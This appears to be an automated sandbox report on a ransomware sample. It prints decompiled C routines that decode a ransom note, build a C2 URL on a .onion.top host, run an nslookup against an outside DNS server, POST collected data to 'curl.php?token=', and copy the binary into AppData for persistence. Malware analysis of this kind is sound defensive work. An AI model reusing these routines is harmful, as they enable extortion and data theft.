lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A84147
lstrcpyW.KERNEL32 ref: 00A841C2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A841C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00A842DE

Strings

c, xrefs: 00A8428C
:, xrefs: 00A8424C
t, xrefs: 00A842B4
h, xrefs: 00A8426C
h, xrefs: 00A8423C
7, xrefs: 00A84284
o, xrefs: 00A8429C
t, xrefs: 00A84244
/, xrefs: 00A84254
k, xrefs: 00A84294
q, xrefs: 00A8427C
d, xrefs: 00A8425C
%s%s, xrefs: 00A842F3
ransom_id=, xrefs: 00A84134, 00A84140
{USERID}, xrefs: 00A8419F, 00A841ED, 00A841F3
j, xrefs: 00A84274
p, xrefs: 00A842BC
n, xrefs: 00A842AC
i, xrefs: 00A842A4
b, xrefs: 00A84264

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$ransom_id=$t$t${USERID}
API String ID: 4100118565-914392996
Opcode ID: 106a0774e6a30c643a1221d7f9eb9c1f3f0993fdcefad6ae6962fbbf42b6e592
Instruction ID: 818609b537bbc363aa133d76f13916d9e5354d11edb34297ca5b572511fec185
Opcode Fuzzy Hash: 106a0774e6a30c643a1221d7f9eb9c1f3f0993fdcefad6ae6962fbbf42b6e592
Instruction Fuzzy Hash: 5E51E170618301ABE720EF14DC09B7B7BE5FB85B44F504A1CF5866B290EBB49D45CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A84186 Relevance: 42.1, APIs: 5, Strings: 19, Instructions: 96
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A84186(void* __eax, void* __ebp, WCHAR* _a12, char _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, short _a84, void* _a92, char _a96) {
				void* _t31;
				void* _t35;
				WCHAR* _t36;
				signed short _t40;
				signed short* _t41;
				signed int _t46;
				signed int _t47;
				void* _t50;
				WCHAR* _t51;
				WCHAR* _t53;
				void* _t56;
				WCHAR* _t72;

				_t31 = __eax;
				do {
					 *(_t31 + 0xa92000) =  *(_t31 + 0xa92000) ^ 0x00000005;
					_t31 = _t31 + 1;
				} while (_t31 < 0xad6);
				 *0xa92b04 = 0xa92000;
				_t51 = E00A87BA0(0xa92000, L"{USERID}");
				if(_t51 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t51, _t53);
						_t51[lstrlenW(_t51)] = 0x20;
						_t51 = 0xa92000;
						_t40 =  *0xa92000; // 0xfeff
						if(_t40 == 0) {
							goto L14;
						}
						_t46 = _t40 & 0x0000ffff;
						_t56 = 0xa92000 - L"{USERID}";
						do {
							_t41 = L"{USERID}";
							if(_t46 == 0) {
								goto L12;
							} else {
								while(1) {
									_t47 =  *_t41 & 0x0000ffff;
									if(_t47 == 0) {
										break;
									}
									_t50 = ( *(_t56 + _t41) & 0x0000ffff) - _t47;
									if(_t50 != 0) {
										L11:
										if( *_t41 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t41 =  &(_t41[1]);
										if( *(_t56 + _t41) != _t50) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L14;
								}
								_t53 = _a12;
								goto L4;
							}
							goto L14;
							L12:
							_t7 =  &(_t51[1]); // 0x2d002d
							_t46 =  *_t7 & 0x0000ffff;
							_t51 =  &(_t51[1]);
							_t56 = _t56 + 2;
						} while (_t46 != 0);
						_t53 = _a12;
						goto L14;
					}
				}
				L14:
				_a16 = 0x740068;
				_a20 = 0x700074;
				_a24 = 0x2f003a;
				_a28 = 0x67002f;
				_a32 = 0x630064;
				_a36 = 0x670062;
				_a40 = 0x760068;
				_a44 = 0x79006a;
				_a48 = 0x790071;
				_a52 = 0x6a0037;
				_a56 = 0x6c0063;
				_a60 = 0x2e006b;
				_a64 = 0x6e006f;
				_a68 = 0x6f0069;
				_a72 = 0x2e006e;
				_a76 = 0x6f0074;
				_a80 = 0x2f0070;
				_a84 = 0;
				_t72 =  *0xa92ae4; // 0x880000
				if(_t72 == 0) {
					_t36 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
					 *0xa92ae4 = _t36;
					if(_t36 != 0) {
						wsprintfW(_t36, L"%s%s",  &_a16, _t53);
					}
				}
				VirtualFree(_a92, 0, 0x8000); // executed
				_t35 = E00A87720( &_a96);
				return _t35;
			}

0x00a84186
0x00a84190
0x00a84190
0x00a84197
0x00a84198
0x00a841a4
0x00a841b8
0x00a841bc
0x00a841c0
0x00a841c0
0x00a841c2
0x00a841d4
0x00a841d8
0x00a841dd
0x00a841e6
0x00000000
0x00000000
0x00a841ea
0x00a841ed
0x00a841f3
0x00a841f3
0x00a841fb
0x00000000
0x00a84200
0x00a84200
0x00a84200
0x00a84206
0x00000000
0x00000000
0x00a84210
0x00a84212
0x00a8421d
0x00a84221
0x00000000
0x00000000
0x00000000
0x00000000
0x00a84214
0x00a84214
0x00a8421b
0x00000000
0x00000000
0x00000000
0x00000000
0x00a8421b
0x00000000
0x00a84212
0x00a84322
0x00000000
0x00a84322
0x00000000
0x00a84227
0x00a84227
0x00a84227
0x00a8422b
0x00a8422e
0x00a84231
0x00a84236
0x00000000
0x00a84236
0x00a841c0
0x00a8423a
0x00a8423c
0x00a84244
0x00a8424c
0x00a84254
0x00a8425c
0x00a84264
0x00a8426c
0x00a84274
0x00a8427c
0x00a84284
0x00a8428c
0x00a84294
0x00a8429c
0x00a842a4
0x00a842ac
0x00a842b4
0x00a842bc
0x00a842c4
0x00a842c9
0x00a842cf
0x00a842de
0x00a842e4
0x00a842eb
0x00a842f9
0x00a842ff
0x00a842eb
0x00a8430d
0x00a84317
0x00a84321

APIs

lstrcpyW.KERNEL32 ref: 00A841C2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00A841C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00A842DE
wsprintfW.USER32 ref: 00A842F9
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00A8430D

Strings

c, xrefs: 00A8428C
:, xrefs: 00A8424C
t, xrefs: 00A842B4
h, xrefs: 00A8426C
h, xrefs: 00A8423C
7, xrefs: 00A84284
o, xrefs: 00A8429C
t, xrefs: 00A84244
/, xrefs: 00A84254
k, xrefs: 00A84294
q, xrefs: 00A8427C
d, xrefs: 00A8425C
%s%s, xrefs: 00A842F3
{USERID}, xrefs: 00A8419F, 00A841ED, 00A841F3
j, xrefs: 00A84274
p, xrefs: 00A842BC
n, xrefs: 00A842AC
i, xrefs: 00A842A4
b, xrefs: 00A84264

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$t$t${USERID}
API String ID: 4033391921-198931148
Opcode ID: 00c6d90d4d819a6505ae9df92720e3e2ed4e03a4a08a5e30433ecc1db3143872
Instruction ID: 5fb2f39923bc8fffde8b1887b2069f98c95c20b9d0df13c89dd7988a2a27b69d
Opcode Fuzzy Hash: 00c6d90d4d819a6505ae9df92720e3e2ed4e03a4a08a5e30433ecc1db3143872
Instruction Fuzzy Hash: 6341CC70508342DBD720EF50D85837BBBF2FB85748F44491CF5865B260E7B6894ACB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A84D60 Relevance: 40.4, APIs: 8, Strings: 15, Instructions: 101
pipememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00A84D60(CHAR* __ecx, void* __edx) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				short _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t28;
				void* _t37;
				CHAR* _t43;
				void* _t45;

				_v76 = 0x73006e;
				_v20 = 0;
				_t37 = __edx;
				_v16.lpSecurityDescriptor = 0;
				_t43 = __ecx;
				_v72 = 0x6f006c;
				_v68 = 0x6b006f;
				_v64 = 0x700075;
				_v60 = 0x250020;
				_v56 = 0x200053;
				_v52 = 0x6e0064;
				_v48 = 0x310073;
				_v44 = 0x73002e;
				_v40 = 0x70006f;
				_v36 = 0x6f0072;
				_v32 = 0x6e0064;
				_v28 = 0x2e0073;
				_v24 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_t24 = CreatePipe(0xa92b10, 0xa92b0c,  &_v16, 0); // executed
				if(_t24 != 0) {
					_t24 = SetHandleInformation( *0xa92b10, 1, 0);
					if(_t24 == 0) {
						goto L1;
					} else {
						CreatePipe(0xa92b08, 0xa92b14,  &_v16, 0); // executed
						_t24 = SetHandleInformation( *0xa92b14, 1, 0);
						if(_t24 == 0) {
							goto L1;
						} else {
							_t28 = VirtualAlloc(0, 0x2800, 0x3000, 4); // executed
							_t45 = _t28;
							if(_t45 == 0) {
								lstrcpyA(_t43, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t45,  &_v76, _t37);
								E00A84B10(_t45); // executed
								E00A84CB0(_t37, _t43, _t37, _t43, _t45); // executed
								VirtualFree(_t45, 0, 0x8000); // executed
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t24 | 0xffffffff;
				}
			}

0x00a84d6b
0x00a84d73
0x00a84d77
0x00a84d79
0x00a84d7c
0x00a84d81
0x00a84d93
0x00a84d9a
0x00a84da1
0x00a84da8
0x00a84daf
0x00a84db6
0x00a84dbd
0x00a84dc4
0x00a84dcb
0x00a84dd2
0x00a84dd9
0x00a84de0
0x00a84de7
0x00a84dee
0x00a84df5
0x00a84dfd
0x00a84e19
0x00a84e1d
0x00000000
0x00a84e1f
0x00a84e2f
0x00a84e3f
0x00a84e43
0x00000000
0x00a84e45
0x00a84e53
0x00a84e59
0x00a84e5d
0x00a84e9b
0x00a84ea9
0x00a84e5f
0x00a84e65
0x00a84e70
0x00a84e79
0x00a84e86
0x00a84e94
0x00a84e94
0x00a84e5d
0x00a84e43
0x00a84dff
0x00a84dff
0x00a84e08
0x00a84e08

APIs

CreatePipe.KERNEL32(00A92B10,00A92B0C,?,00000000,00000000,00000001,00000000), ref: 00A84DF5
SetHandleInformation.KERNEL32(00000001,00000000), ref: 00A84E19
CreatePipe.KERNEL32(00A92B08,00A92B14,0000000C,00000000), ref: 00A84E2F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 00A84E3F
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 00A84E53
wsprintfW.USER32 ref: 00A84E65
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A84E86

Strings

u, xrefs: 00A84D9A
s, xrefs: 00A84DB6
r, xrefs: 00A84DCB
n, xrefs: 00A84D6B
o, xrefs: 00A84DC4
S, xrefs: 00A84DA8
r, xrefs: 00A84DE0
fabian wosar <3, xrefs: 00A84E95
, xrefs: 00A84DA1
d, xrefs: 00A84DD2
d, xrefs: 00A84DAF
., xrefs: 00A84DBD
l, xrefs: 00A84D81
o, xrefs: 00A84D93
s, xrefs: 00A84DD9

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $.$S$d$d$fabian wosar <3$l$n$o$o$r$r$s$s$u
API String ID: 1490407255-783179298
Opcode ID: 2cac03d61e9a11ca1f259211792995877bdd75952a7f1efc58de0f893b6501ba
Instruction ID: 46a1e48bef46f7a850af1946466eaaf742a18158fdf0a08ff358cc34c503bcf0
Opcode Fuzzy Hash: 2cac03d61e9a11ca1f259211792995877bdd75952a7f1efc58de0f893b6501ba
Instruction Fuzzy Hash: 0831C271B41209BBDB10DF95AC89BEEBFF9FB08714F144125E904A6281DBF145458BA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A85370 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136
stringmemorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 35%

			E00A85370(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				short _v136;
				char _v1156;
				short _v1160;
				void* _t31;
				int _t45;
				void* _t53;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t60;
				void* _t61;
				void* _t70;
				short _t71;

				_t59 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E00A877F0( &_v36); // executed
				_t31 = E00A84EB0(); // executed
				_v24 = _t31;
				_t70 = 0x400 + lstrlenA(_t59) * 2;
				_t7 = _t70 + 1; // 0x74656981
				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v28 = _t60;
				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t60 == 0) {
					L2:
					_t60 = 0;
					L3:
					lstrcatA(_t60, "data=");
					lstrcatA(_t60, _v12);
					asm("movdqu xmm0, [0xa8ffd0]");
					asm("movdqu [ebp-0x84], xmm0");
					asm("movdqu xmm0, [0xa8ffe0]");
					asm("movdqu [ebp-0x74], xmm0");
					asm("movdqu xmm0, [0xa8fff0]");
					asm("movdqu [ebp-0x64], xmm0");
					asm("movdqu xmm0, [0xa90000]");
					asm("movdqu [ebp-0x54], xmm0");
					asm("movdqu xmm0, [0xa90010]");
					asm("movdqu [ebp-0x44], xmm0");
					asm("movdqu xmm0, [0xa90020]");
					asm("movdqu [ebp-0x34], xmm0");
					lstrlenA(_t60);
					_t71 = 0;
					_v1160 = 0;
					E00A88B30( &_v1156, 0, 0x3fc);
					lstrcpyW( &_v1160, L"curl.php?token=");
					E00A85270( &_v1160);
					_t45 = lstrlenW( &_v136);
					_t74 = _v16;
					_push(_t45);
					_push( &_v136);
					_push(L"POST");
					_push(0x31fff);
					_push(_v16);
					_push(lstrlenA(_t60));
					_push(_t60);
					_t61 = _v24;
					_push( &_v1160);
					_push(_t61);
					if(E00A87A00( &_v36) != 0) {
						_t71 = 1;
						if(_a4 != 0) {
							_v12 = 0;
							if(E00A85050(_t74,  &_v12) == 0) {
								_t71 = 0;
							} else {
								_t57 = _v12;
								if(_t57 != 0) {
									 *_v20 = _t57;
								}
							}
						}
					}
					VirtualFree(_t61, 0, 0x8000);
					VirtualFree(_v16, 0, 0x8000);
					VirtualFree(_v28, 0, 0x8000);
					_t53 = _v32;
					if(_t53 != 0) {
						InternetCloseHandle(_t53);
					}
					return _t71;
				}
				_t10 = _t70 + 1; // 0x74656981
				if(_t70 < _t10) {
					goto L3;
				}
				goto L2;
			}

0x00a8537b
0x00a8537d
0x00a85384
0x00a85387
0x00a8538c
0x00a85392
0x00a853a8
0x00a853af
0x00a853c3
0x00a853c7
0x00a853cc
0x00a853d1
0x00a853da
0x00a853da
0x00a853dc
0x00a853e8
0x00a853ee
0x00a853f0
0x00a853f9
0x00a85401
0x00a85409
0x00a8540e
0x00a85416
0x00a8541b
0x00a85423
0x00a85428
0x00a85430
0x00a85435
0x00a8543d
0x00a85442
0x00a85448
0x00a85457
0x00a8545d
0x00a85471
0x00a8547d
0x00a85489
0x00a8548f
0x00a85492
0x00a85499
0x00a8549a
0x00a854a2
0x00a854a7
0x00a854af
0x00a854b0
0x00a854b1
0x00a854ba
0x00a854bb
0x00a854c6
0x00a854cc
0x00a854d1
0x00a854d6
0x00a854e6
0x00a854f6
0x00a854e8
0x00a854e8
0x00a854ed
0x00a854f2
0x00a854f2
0x00a854ed
0x00a854e6
0x00a854d1
0x00a85506
0x00a85512
0x00a8551e
0x00a85520
0x00a85525
0x00a85528
0x00a85528
0x00a85536
0x00a85536
0x00a853d3
0x00a853d8
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 00A877F0: InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 00A879D4
Part of subcall function 00A877F0: InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 00A879ED

Part of subcall function 00A84EB0: VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74656980,00000000,00000000), ref: 00A84F22
Part of subcall function 00A84EB0: Sleep.KERNEL32(00002710), ref: 00A84F4C
Part of subcall function 00A84EB0: lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 00A84F5A
Part of subcall function 00A84EB0: VirtualAlloc.KERNEL32(00000000,00000000), ref: 00A84F6A
Part of subcall function 00A84EB0: lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 00A84F7E
Part of subcall function 00A84EB0: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A84F8F
Part of subcall function 00A84EB0: wsprintfW.USER32 ref: 00A84FA7
Part of subcall function 00A84EB0: VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00A84FB8

lstrlenA.KERNEL32(00000000,74656980,00000000,00000000), ref: 00A85395
VirtualAlloc.KERNEL32(00000000,74656981,00003000,00000040), ref: 00A853B5
VirtualAlloc.KERNEL32(00000000,00032001,00003000,00000040), ref: 00A853CA
lstrcatA.KERNEL32(00000000,data=), ref: 00A853E8
lstrcatA.KERNEL32(00000000,00A856FE), ref: 00A853EE
lstrlenA.KERNEL32(00000000), ref: 00A85442
_memset.LIBCMT ref: 00A8545D
lstrcpyW.KERNEL32 ref: 00A85471
lstrlenW.KERNEL32(?), ref: 00A85489
lstrlenA.KERNEL32(00000000,?,00031FFF,?,00000000), ref: 00A854A9
VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,00000000,?,00000000), ref: 00A85506
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 00A85512
VirtualFree.KERNEL32(?,00000000,00008000,?,00000000), ref: 00A8551E
InternetCloseHandle.WININET(?), ref: 00A85528

Strings

curl.php?token=, xrefs: 00A8546B
POST, xrefs: 00A8549A
data=, xrefs: 00A853E2

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Virtual$Freelstrlen$Alloc$Internet$Openlstrcat$CloseHandleSleep_memsetlstrcmpilstrcpywsprintf
String ID: POST$curl.php?token=$data=
API String ID: 186108914-1715678351
Opcode ID: 6d6b8fc85eb275c110e5a94b47030f8f78dd1ce5b4ffb0c9a3b069b1ffa1f30b
Instruction ID: c24557c2fad161d4d1714b6a543e9d0eba304382e2db944a02259bc5f250d360
Opcode Fuzzy Hash: 6d6b8fc85eb275c110e5a94b47030f8f78dd1ce5b4ffb0c9a3b069b1ffa1f30b
Instruction Fuzzy Hash: 6F51B1B2E0031AAADB11EBE8DC45FEEBB7CFB88700F104555EA44B6181EB745A45CB60

Uniqueness

Uniqueness Score: -1.00%

Function 00A82AD0 Relevance: 29.9, APIs: 10, Strings: 7, Instructions: 114
stringmemorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 93%

			E00A82AD0() {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				short _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				long _v32;
				intOrPtr _v36;
				WCHAR* _t24;
				void* _t27;
				WCHAR* _t33;
				WCHAR* _t38;
				signed int _t40;
				signed int _t46;
				WCHAR* _t50;
				WCHAR* _t54;
				void* _t56;
				WCHAR* _t57;
				void* _t58;
				WCHAR* _t64;
				WCHAR* _t65;
				WCHAR* _t67;
				signed int _t69;
				void* _t71;
				void* _t72;

				_t71 = (_t69 & 0xfffffff8) - 0x1c;
				_t24 = VirtualAlloc(0, 0x800, 0x3000, 0x40); // executed
				_v24 = _t24;
				_t64 = _t24;
				_v32 = 0;
				if(_t24 == 0) {
					_t67 = 0;
					_t50 = 0;
					__eflags = 0;
				} else {
					_t3 =  &(_t24[0x101]); // 0x202
					_t65 = _t3;
					_v32 = 0x404;
					_t50 = _t65;
					_t67 = _t24;
					_t64 =  &(_t65[0x101]);
				}
				_v28 = _t67;
				GetModuleFileNameW(0, _t67, 0x100);
				GetTempPathW(0x100, _t50);
				_t6 =  &(_t50[1]); // 0x204
				_t27 = E00A87BA0(_t67, _t6);
				_t75 = _t27;
				if(_t27 == 0) {
					_v20 = 0x520050;
					_v8 = 0;
					_push(0x52);
					_v16 = 0x440049;
					_v12 = 0x520055;
					E00A87C60( &_v20, lstrlenW( &_v20)); // executed
					_t72 = _t71 + 4;
					GetEnvironmentVariableW(L"AppData", _t50, 0x100);
					_t13 =  &(_t50[1]); // 0x2
					_t54 = _t67;
					_t33 = E00A87BA0(_t54, _t13);
					__eflags = _t33;
					if(_t33 == 0) {
						lstrcatW(_t50, L"\\Microsoft\\");
						lstrcatW(_t50,  &_v20);
						lstrcatW(_t50, L".exe");
						_push(_t54);
						_t38 = E00A82890(_v28, _t50); // executed
						_t72 = _t72 + 4;
						__eflags = _t38;
						if(_t38 == 0) {
							goto L17;
						}
						_t40 = lstrlenW(_t50);
						__eflags = _v28;
						_t56 = 0xa + _t40 * 2;
						if(_v28 == 0) {
							L13:
							_t64 = 0;
							__eflags = 0;
							L14:
							_push(_t50);
							L15:
							wsprintfW(_t64, L"\"%s\"");
							_t57 = _t64;
							goto L16;
						}
						__eflags = _v36 + _t56 - 0x800;
						if(__eflags < 0) {
							goto L14;
						}
						goto L13;
					}
					_t46 = lstrlenW(_t67);
					__eflags = _v28;
					_t58 = 0xa + _t46 * 2;
					if(_v28 == 0) {
						L8:
						_t64 = 0;
						__eflags = 0;
						L9:
						_push(_t67);
						goto L15;
					}
					__eflags = _v36 + _t58 - 0x800;
					if(__eflags < 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t57 = _t67;
					L16:
					E00A82960(_t57, _t75); // executed
					L17:
					ExitThread(0);
				}
			}

0x00a82ad6
0x00a82aea
0x00a82af0
0x00a82af4
0x00a82af6
0x00a82b00
0x00a82b1c
0x00a82b1e
0x00a82b1e
0x00a82b02
0x00a82b02
0x00a82b02
0x00a82b08
0x00a82b10
0x00a82b12
0x00a82b14
0x00a82b14
0x00a82b28
0x00a82b2c
0x00a82b38
0x00a82b3e
0x00a82b43
0x00a82b48
0x00a82b4a
0x00a82b55
0x00a82b62
0x00a82b67
0x00a82b6c
0x00a82b75
0x00a82b89
0x00a82b8e
0x00a82b9c
0x00a82ba2
0x00a82ba5
0x00a82ba7
0x00a82bac
0x00a82bae
0x00a82be4
0x00a82bec
0x00a82bf4
0x00a82bf6
0x00a82bfd
0x00a82c02
0x00a82c05
0x00a82c07
0x00000000
0x00000000
0x00a82c0f
0x00a82c11
0x00a82c16
0x00a82c1d
0x00a82c2c
0x00a82c2c
0x00a82c2c
0x00a82c2e
0x00a82c2e
0x00a82c2f
0x00a82c35
0x00a82c3b
0x00000000
0x00a82c3d
0x00a82c25
0x00a82c2a
0x00000000
0x00000000
0x00000000
0x00a82c2a
0x00a82bb6
0x00a82bb8
0x00a82bbd
0x00a82bc4
0x00a82bd3
0x00a82bd3
0x00a82bd3
0x00a82bd5
0x00a82bd5
0x00000000
0x00a82bd5
0x00a82bcc
0x00a82bd1
0x00000000
0x00000000
0x00000000
0x00a82b4c
0x00a82b4c
0x00a82c40
0x00a82c40
0x00a82c45
0x00a82c47
0x00a82c47

APIs

VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 00A82AEA
GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 00A82B2C
GetTempPathW.KERNEL32(00000100,00000000), ref: 00A82B38
lstrlenW.KERNEL32(?,?,?,00000052), ref: 00A82B7D

Part of subcall function 00A87C60: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 00A87C7D
Part of subcall function 00A87C60: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 00A87CAB
Part of subcall function 00A87C60: GetModuleHandleA.KERNEL32(?), ref: 00A87CFF
Part of subcall function 00A87C60: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 00A87D0D
Part of subcall function 00A87C60: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 00A87D1C
Part of subcall function 00A87C60: CryptReleaseContext.ADVAPI32(?,00000000), ref: 00A87D65
Part of subcall function 00A87C60: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 00A87D73

GetEnvironmentVariableW.KERNEL32(AppData,00000000,00000100), ref: 00A82B9C
lstrcatW.KERNEL32(00000000,\Microsoft\), ref: 00A82BE4
lstrcatW.KERNEL32(00000000,?), ref: 00A82BEC
lstrcatW.KERNEL32(00000000,.exe), ref: 00A82BF4
wsprintfW.USER32 ref: 00A82C35
ExitThread.KERNEL32 ref: 00A82C47

Strings

P, xrefs: 00A82B55
\Microsoft\, xrefs: 00A82BDE
AppData, xrefs: 00A82B97
"%s", xrefs: 00A82C2F
U, xrefs: 00A82B75
.exe, xrefs: 00A82BEE
I, xrefs: 00A82B6C

Memory Dump Source

Source File: 00000001.00000002.532091745.0000000000A81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000001.00000002.532084622.0000000000A80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532107831.0000000000A89000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.532145074.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_a80000_eW1QrimJYd.jbxd

Yara matches

Similarity

API ID: Virtuallstrcat$AllocContextCryptModule$AcquireAddressEnvironmentExitFileFreeHandleLibraryLoadNamePathProcReleaseTempThreadVariablelstrlenwsprintf
String ID: "%s"$.exe$AppData$I$P$U$\Microsoft\
API String ID: 139215849-2398311915
Opcode ID: ee7bf7e7c0193e5603c1404ccdb14801bfeac751919e8d838d4b115f0ed63e50
Instruction ID: 3092c84cda2895540609ff124ed073eb648d58e4510907c3012e042058fe40f8
Opcode Fuzzy Hash: ee7bf7e7c0193e5603c1404ccdb14801bfeac751919e8d838d4b115f0ed63e50
Instruction Fuzzy Hash: 3C41C2B0204300ABE300FF609C4DB7F7BE9BF84704F044828F55696291EB74D909CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00A87369 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 123
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00A87369(signed int __eax, intOrPtr __edx, void* __esi) {
				signed int _t51;
				signed int _t54;
				signed int _t56;
				void* _t58;
				long _t59;
				int _t72;
				void* _t75;
				signed int _t77;
				signed int _t80;
				intOrPtr _t85;
				WCHAR* _t88;
				intOrPtr _t93;
				signed int _t95;
				intOrPtr _t100;
				void* _t102;
				void* _t104;
				void* _t106;

				_t102 = __esi;
				_t93 = __edx;
				_t51 = __eax;
				do {
					 *(_t104 - 0x24) =  *((intOrPtr*)(_t104 + _t51 * 2 - 0x80));
					_t54 = GetDriveTypeW(_t104 - 0x24); // executed
					_t95 = _t54;
					if(_t95 <= 2 || _t95 == 5) {
						L6:
					} else {
						 *((short*)(_t104 - 0x20)) = 0;
